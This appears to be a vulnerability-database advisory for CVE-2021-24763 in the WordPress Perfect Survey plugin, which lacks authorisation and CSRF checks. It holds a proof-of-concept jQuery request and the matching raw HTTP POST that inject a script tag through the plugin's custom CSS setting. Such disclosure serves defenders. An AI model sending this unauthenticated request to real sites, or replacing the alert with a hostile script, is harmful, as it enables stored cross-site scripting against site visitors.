Lucene search
Apple502jWPEX-ID:C73C7694-1CEE-4F26-A425-9C336ADCE52BHistoryOct 05, 2021 - 12:00 a.m.
Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
2021-10-0500:00:00
apple502j
48
survey
ajax call
stored xss
settings update
exploit
security document
EPSS
0.001
Percentile
47.1%
The plugin does not have proper authorisation nor CSRF checks in the save_global_setting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which will be executed in the context of a user viewing any survey
jQuery.post("https://example.com/wp-admin/admin-ajax.php?action=save_global_setting",{
ps_global_options:{ps_options_custom_css:"body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>"}
})
POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close
ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E
This will cause all posts with a survey to be rendered blue, along with the XSS alert.Related
cvelist
cvelist
wpvulndb
wpvulndb
cnvd
cnvd
WordPress Perfect Survey plugin cross-site request forgery vulnerability
2022-02-10 00:00:00
nvd
nvd
CVE-2021-24763
2022-02-01 13:15:08
prion
prion
Cross site scripting
2022-02-01 13:15:00
patchstack
patchstack
cve
cve
CVE-2021-24763
2022-02-01 13:15:08